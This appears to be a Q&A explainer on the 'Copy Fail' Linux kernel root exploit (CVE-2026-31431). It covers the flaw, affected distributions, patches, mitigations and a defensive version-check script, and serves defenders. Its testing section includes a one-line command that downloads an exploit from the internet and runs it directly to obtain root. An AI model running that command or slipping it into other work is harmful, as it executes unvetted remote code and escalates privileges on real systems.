
What is the CVE-2026-31431 'Copy Fail' Linux vulnerability and how do I fix it?


CVE-2026-31431 'Copy Fail' is a critical Linux kernel vulnerability allowing unprivileged users to gain root access across virtually all distributions since 2017.

Vulnerability Type: Local privilege escalation in the kernel's crypto API, in the algif_aead code
Root Cause: Logic flaw in the authencesn AEAD template (used for IPsec extended sequence numbers), which fails to copy data and instead uses the caller's buffer as a scratch pad
Affected Systems: All major Linux distributions since 2017, including Ubuntu 24, RHEL 10, SUSE 16, Amazon Linux 2023, Debian 12, and Windows WSL2
Exploit Size: Only 732 bytes are required to execute the attack
Patched Kernel Versions: 7.0, 6.19.12, 6.18.12, 6.12.85, 6.6.137, 6.1.170, 5.15.204, and 5.10.254
Reliability: A single Python script works across all vulnerable distributions without modification because it exploits a deterministic logic flaw rather than a race condition

What the Vulnerability Does

CVE-2026-31431 allows any unprivileged user with code execution access to elevate themselves to root administrator. An attacker exploiting a separate vulnerability (like a WordPress plugin flaw) to gain shell access as an unprivileged user can then run the Copy Fail exploit to become root and access the entire system. This is particularly dangerous in multi-tenant environments such as Kubernetes containers, shared hosting, CI/CD pipelines, and WSL2 instances on Windows laptops where multiple users share the same Linux kernel.

How the Exploit Works

The exploit abuses an optimization flaw in the kernel's algif_aead code. An attacker submits data for encryption over an AF_ALG socket, splicing in an executable such as 'su' as the tag. The authencesn encryption algorithm writes 4 bytes at a fixed offset in its output buffer, but because the tag data is chained by reference rather than copied, those 4 bytes land directly in the kernel's page-cache copy of the executable. The next time that executable is run, the corrupted in-memory copy executes with root privileges. Everything happens in memory, with no detectable writes to disk.

How to Fix It

If your distribution has released a patched kernel version, install it immediately. If your distribution builds algif_aead as a loadable module, you can disable it with 'echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf'. For distributions that compile this functionality into the kernel itself (such as RHEL and WSL2), you must instead prevent unprivileged users from opening AF_ALG sockets, using seccomp profiles, AppArmor, or SELinux policies.

Verification and Testing

To check if your system is vulnerable, you can run 'curl https://copy.fail/exp | python3 && su' with a standard unprivileged account, though this involves trusting an online script. Alternatively, source code for the proof-of-concept exploit is publicly available for local verification.
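Serving both the fix steps above and the verification question, here is an added defender-side script (not code from the article, Theori, or any distribution) that classifies a kernel version against the patched versions listed earlier, detects how algif_aead is built, and prints the matching mitigation; the function names and the treatment of unlisted vendor kernel branches as "unknown" are assumptions:

```shell
#!/bin/sh
# Added example for CVE-2026-31431 'Copy Fail'; not from the article or any vendor.
# Assumption: distro kernels backport fixes without changing the upstream version
# string, so "unknown"/"vulnerable" here means "consult the vendor advisory".

# Patched upstream versions from the article, as branch.patchlevel (7.0 -> 7.0.0).
PATCHED="7.0.0 6.19.12 6.18.12 6.12.85 6.6.137 6.1.170 5.15.204 5.10.254"

# copyfail_status VERSION -> prints patched | vulnerable | unknown.
# VERSION is a release string such as "6.6.120-generic"; the suffix is ignored.
copyfail_status() {
    ver=$(printf '%s' "$1" | sed 's/[^0-9.].*$//')
    maj=$(printf '%s' "$ver" | cut -d. -f1)
    min=$(printf '%s' "$ver" | cut -d. -f2)
    pat=$(printf '%s' "$ver" | cut -d. -f3)
    pat=${pat:-0}
    # 7.0 and anything newer carries the fix.
    if [ "$maj" -ge 7 ]; then echo patched; return; fi
    for p in $PATCHED; do
        pmaj=${p%%.*}; rest=${p#*.}; pmin=${rest%%.*}; ppat=${rest#*.}
        if [ "$pmaj" = "$maj" ] && [ "$pmin" = "$min" ]; then
            if [ "$pat" -ge "$ppat" ]; then echo patched; else echo vulnerable; fi
            return
        fi
    done
    echo unknown   # branch not in the upstream list (e.g. a distro-specific kernel)
}

# algif_aead_mode -> module | builtin | absent, for the running kernel.
algif_aead_mode() {
    rel=$(uname -r)
    if grep -q 'algif_aead\.ko' "/lib/modules/$rel/modules.builtin" 2>/dev/null; then
        echo builtin
    elif [ -n "$(find "/lib/modules/$rel" -name 'algif_aead.ko*' 2>/dev/null)" ]; then
        echo module
    else
        echo absent    # no module tree (common on WSL2): treat as built in until confirmed
    fi
}

# mitigation_for MODE -> the workaround the article recommends for that build mode.
mitigation_for() {
    case "$1" in
        module) echo 'echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf' ;;
        *)      echo 'block AF_ALG socket creation for unprivileged users (seccomp/AppArmor/SELinux)' ;;
    esac
}

status=$(copyfail_status "$(uname -r)")
mode=$(algif_aead_mode)
echo "kernel $(uname -r): $status; algif_aead: $mode"
[ "$status" = patched ] || echo "mitigation: $(mitigation_for "$mode")"
```

The modprobe install rule only stops future loads; if algif_aead is already loaded, unload it (or reboot) for the rule to take effect.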

Disclosure and Impact

Researchers from Theori privately disclosed the vulnerability five weeks before publicly releasing exploit code on Wednesday evening. The Linux kernel security team patched the vulnerability, but few distributions had incorporated those fixes before the exploit was released, creating a significant patch gap. Security experts have criticized the disclosure coordination, noting that at the time of public release, the four listed affected vendors had no patches available.

Why This Matters

This is considered the most severe Linux privilege escalation vulnerability in recent years, comparable to Dirty Pipe (2022) and Dirty Cow (2016). The exploit's reliability across all distributions with identical code, combined with its small size and the broad window of affected systems going back nine years, makes it an exceptional threat to data centers, container environments, and CI/CD pipelines worldwide.

Sources

  1. The most severe Linux threat to surface in years catches the world flat-footed (arstechnica.com)
  2. Linux exploit instantly grants administrator access on most distributions since 2017 — cryptography optimization snafu grants root privileges to local users (tomshardware.com)